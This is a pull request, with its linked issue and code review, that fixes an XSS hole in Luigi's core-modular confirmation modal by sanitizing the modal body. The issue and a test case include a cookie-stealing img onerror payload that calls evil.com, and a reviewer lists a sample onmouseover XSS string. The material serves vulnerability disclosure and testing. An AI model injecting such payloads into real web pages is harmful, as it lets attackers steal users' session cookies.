### PR TITLE
Sanitize confirmation modal body

### LINKED ISSUE #5342: XSS: Sanitize confirmation modal body in core-modular before passing to connector
## Summary

The confirmation modal `body` field is not sanitized in `core-modular` before being passed to the connector's `renderConfirmationModal()`. This means any connector implementation (UI5 Svelte library, custom connectors) that renders the body as HTML is vulnerable to XSS attacks from micro-frontends.

## Attack Vector

A micro-frontend can inject arbitrary JavaScript via `LuigiClient.uxManager().showConfirmationModal()`:

```js
LuigiClient.uxManager().showConfirmationModal({
  body: '<img src=x onerror="fetch(\'https://evil.com?\'+document.cookie)">'
});
```

Since the body is passed through unsanitized, any connector using `innerHTML` or `{@html}` to render it will execute the injected script.

## Current State

- **Legacy core** (`core/src/ConfirmationModal.svelte`): Sanitizes via `EscapingHelpers.sanatizeHtmlExceptTextFormatting()` before rendering — **not vulnerable**
- **core-modular** (`UXModule.handleConfirmationModalRequest` / `UxAPI.showConfirmationModal`): Does NOT sanitize before calling `renderConfirmationModal()` on the connector — **vulnerable**

## Proposed Fix

Call `EscapingHelpers.sanatizeHtmlExceptTextFormatting()` on `confirmationModalSettings.body` in two places before passing to the connector:

1. **`src/modules/ux-module.ts`** — `handleConfirmationModalRequest()` (client-initiated modals)
2. **`src/core-api/ux.ts`** — `showConfirmationModal()` (core-API-initiated modals)

```typescript
import { EscapingHelpers } from '../utilities/helpers/escaping-helpers';

// after i18n translation of settings:
confirmationModalSettings = {
  ...confirmationModalSettings,
  body: EscapingHelpers.sanatizeHtmlExceptTextFormatting(confirmationModalSettings.body || '')
};
```

The function already exists in `src/utilities/helpers/escaping-helpers.ts` and allows only safe text-formatting tags: `<b>`, `<i>`, `<br>`, `<strong>`, `<em>`, `<mark>`, `<small>`, `<del>`, `<ins>`, `<sub>`, `<sup>`.

This protects all current and future connector implementations without requiring each to implement sanitization independently.

## Impact

Any connector that renders the body as HTML (which is the expected pattern given that the legacy core supports formatting tags in the body) is affected. This includes the `luigi-ui5-library-svelte` connector currently in development.

### PR DESCRIPTION
**Pull request by walmazacn**
**Description**

Changes proposed in this pull request:

- sanitizes confirmation modal body in core modular

**Related issue(s)**

Resolves #5342

### CODE REVIEW

File: core-modular/src/modules/ux-module.ts [hunk 1]
```diff
@@ -79,13 +80,17 @@ export const UXModule = {
...
+        : UXModule.luigi.i18n().getTranslation('luigi.confirmationModal.body');
+
       confirmationModalSettings = {
         ...confirmationModalSettings,
         ...{
           header: UXModule.luigi
             .i18n()
             .getTranslation(confirmationModalSettings.header || 'luigi.confirmationModal.header'),
-          body: UXModule.luigi.i18n().getTranslation(confirmationModalSettings.body || 'luigi.confirmationModal.body'),
+          body: EscapingHelpers.sanatizeHtmlExceptTextFormatting(modalBody),
```
Comment (JohannesDoberer) [inline core-modular/src/modules/ux-module.ts:93]: Tests would be good

**Review by JohannesDoberer — COMMENTED** [review]
Besides the comment looks good to me!

File: core-modular/test/modules/ux-module.spec.ts [hunk 2]
```diff
@@ -0,0 +1,101 @@
...
+      {
+        input: '<img src="https://example.com/logo.png" />',
+        output: '&lt;img src=&quot;https://example.com/logo.png&quot; /&gt;'
+      },
+      {
+        input: '<img src=x onerror="fetch(\'https://evil.com?\'+document.cookie)">',
+        output: '&lt;img src=x onerror=&quot;fetch(&#39;https://evil.com?&#39;+document.cookie)&quot;&gt;'
+      }
+    ])('sanitizes body content', async (data) => {
+      const sanitizeHtmlSpy = jest.spyOn(EscapingHelpers, 'sanatizeHtmlExceptTextFormatting');
```
Comment (JohannesDoberer) [inline core-modular/test/modules/ux-module.spec.ts:92]: The tests here only verify via spy that sanatizeHtmlExceptTextFormatting is called and the expected output ends up in body — good integration test at the module level.

However, there are no dedicated unit tests for sanatizeHtmlExceptTextFormatting itself (e.g. in an escaping-helpers.spec.ts). The function combines sanitizeHtml + restoreSanitizedElements and has its own edge cases that aren't covered here, e.g.:

Allowed tags (<b>, <i>, <br>, <mark>, <strong>, etc.) are correctly restored
Disallowed tags (<script>, , <div>) remain escaped
Nested allowed tags (<b><i>text</i></b>)
XSS attempts within allowed tag syntax (<b onmouseover="alert(1)">)
Empty string / undefined input
Consider adding a dedicated describe('sanatizeHtmlExceptTextFormatting', ...) block in escaping-helpers.spec.ts (or extending the existing escaping-helpers.fuzz.spec.ts) that tests the function in isolation.

**Review by JohannesDoberer — DISMISSED** [review]
LGTM

**Review by hardl — APPROVED** [review]
